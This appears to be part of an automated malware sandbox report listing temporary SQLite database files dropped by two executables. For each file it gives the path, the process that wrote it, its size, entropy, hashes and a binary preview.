                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp8492.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp84D1.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp9255.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp9266.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp9277.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp9287.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp9298.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp92A9.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp92B9.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp98E7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpA787.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpA798.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpA7A8.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpA7D8.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpA7F8.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC7B5.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC7C5.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC7D6.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC7E7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC807.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC817.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpC818.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpDF65.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpDF76.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
